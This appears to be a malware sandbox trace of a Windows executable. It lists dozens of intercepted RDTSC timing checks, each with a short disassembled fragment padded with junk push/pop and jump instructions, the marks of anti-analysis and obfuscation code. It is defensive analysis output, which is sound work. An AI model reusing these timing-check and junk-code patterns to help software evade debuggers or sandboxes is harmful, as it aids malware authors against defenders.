Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115521B second address: 115521F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1155495 second address: 11554C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7119h 0x00000007 jmp 00007FE908EE7116h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11554C8 second address: 11554CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11558B8 second address: 11558D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jnp 00007FE908EE7106h 0x00000012 js 00007FE908EE7106h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10E9E93 second address: 10E9E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 112739C second address: 11273A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11273A3 second address: 110FBE0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FE9093D6536h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f sbb cx, 19F1h 0x00000014 call dword ptr [ebp+12A31B0Fh] 0x0000001a jmp 00007FE9093D653Eh 0x0000001f pushad 0x00000020 pushad 0x00000021 push edx 0x00000022 pop edx 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 push edx 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11274D4 second address: 11274D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11279B7 second address: 11279BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11283C0 second address: 11283C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11283C4 second address: 11283EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE9093D6541h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 push esi 0x00000018 pop esi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11283EA second address: 1128410 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE908EE7108h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jnl 00007FE908EE7110h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1128410 second address: 1128445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9093D6548h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FE9093D6545h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1110684 second address: 1110699 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C607 second address: 115C618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C618 second address: 115C61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C61E second address: 115C622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C622 second address: 115C626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C8D4 second address: 115C8DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C8DC second address: 115C8E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE908EE7106h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C8E9 second address: 115C930 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE9093D653Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FE9093D6542h 0x00000016 jmp 00007FE9093D6547h 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e jno 00007FE9093D653Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C930 second address: 115C936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C936 second address: 115C947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9093D653Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C947 second address: 115C94B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115CC27 second address: 115CC41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9093D6546h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11615A9 second address: 11615B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE710Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11615B9 second address: 11615D9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE9093D6536h 0x00000008 jmp 00007FE9093D6540h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11615D9 second address: 11615DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161A7D second address: 1161A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pushad 0x00000008 jmp 00007FE9093D6546h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161BF3 second address: 1161BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161BF7 second address: 1161BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161BFB second address: 1161C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161C01 second address: 1161C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FE9093D6536h 0x0000000e jmp 00007FE9093D653Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161C1D second address: 1161C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161F4A second address: 1161F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161F4E second address: 1161F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161F56 second address: 1161F7F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007FE9093D6536h 0x00000009 jmp 00007FE9093D653Ch 0x0000000e pop edi 0x0000000f ja 00007FE9093D6547h 0x00000015 jmp 00007FE9093D653Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 116210F second address: 116211D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE908EE7106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 116225B second address: 1162261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1168358 second address: 1168374 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE908EE7113h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11685F8 second address: 11685FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11685FD second address: 1168635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7113h 0x00000007 js 00007FE908EE7116h 0x0000000d jmp 00007FE908EE7110h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push esi 0x00000015 jl 00007FE908EE710Eh 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11687A7 second address: 11687AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11687AB second address: 11687EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnl 00007FE908EE7106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FE908EE7118h 0x00000012 jmp 00007FE908EE7112h 0x00000017 pop ebx 0x00000018 pushad 0x00000019 jmp 00007FE908EE7115h 0x0000001e ja 00007FE908EE710Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1168982 second address: 1168999 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6543h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1168D97 second address: 1168D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1169048 second address: 1169054 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jns 00007FE9093D6536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 116918E second address: 11691B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FE908EE7116h 0x0000000b jnl 00007FE908EE7106h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1169302 second address: 1169308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1169308 second address: 116931B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jng 00007FE908EE7106h 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 116E7A7 second address: 116E7AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 116E7AB second address: 116E7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 116FE6E second address: 116FE74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1172265 second address: 117227F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jmp 00007FE908EE710Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 117227F second address: 117229C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6543h 0x00000007 jbe 00007FE9093D6536h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 117534B second address: 1175371 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FE908EE711Bh 0x0000000f jmp 00007FE908EE710Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1174B70 second address: 1174B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1174B75 second address: 1174BA1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE908EE711Fh 0x00000008 jnp 00007FE908EE7106h 0x0000000e jmp 00007FE908EE7113h 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 jns 00007FE908EE7106h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1174BA1 second address: 1174BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9093D6546h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1174BC3 second address: 1174BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE908EE7110h 0x00000009 popad 0x0000000a jmp 00007FE908EE7111h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1174BE9 second address: 1174BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1174BEF second address: 1174BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1174D7E second address: 1174D83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 117507E second address: 1175086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 117D49D second address: 117D4A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 117D5DA second address: 117D5EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FE908EE7106h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 117D762 second address: 117D766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 117D766 second address: 117D78D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7114h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jnp 00007FE908EE7106h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 117D78D second address: 117D7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE9093D6546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 117D7A8 second address: 117D7DA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE908EE711Ch 0x00000008 pushad 0x00000009 jmp 00007FE908EE7111h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 117DC8D second address: 117DC91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1128041 second address: 1128045 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 117DF22 second address: 117DF43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6549h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 117DF43 second address: 117DF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 117E9A1 second address: 117E9B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FE9093D6536h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 117E9B4 second address: 117E9BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 117E9BA second address: 117E9C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 118289B second address: 118289F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 118289F second address: 11828B7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE9093D6536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FE9093D6542h 0x00000010 jc 00007FE9093D6536h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 118B064 second address: 118B068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 118B068 second address: 118B06D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11890D4 second address: 11890E0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE908EE7106h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11890E0 second address: 11890E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1189C58 second address: 1189C7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE908EE7113h 0x0000000b pushad 0x0000000c jp 00007FE908EE7106h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1189F08 second address: 1189F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1189F0C second address: 1189F12 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 118A265 second address: 118A26F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FE9093D6536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 118AAD2 second address: 118AAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE908EE7119h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 118AAF7 second address: 118AB04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FE9093D6536h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 118ADB8 second address: 118ADC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE908EE7106h 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 118ADC9 second address: 118ADD6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE9093D6538h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 119EB49 second address: 119EB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FE908EE710Dh 0x0000000b jmp 00007FE908EE7112h 0x00000010 popad 0x00000011 pushad 0x00000012 jp 00007FE908EE7106h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11A0755 second address: 11A0759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11A3D82 second address: 11A3DA5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FE908EE7115h 0x0000000c jp 00007FE908EE710Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
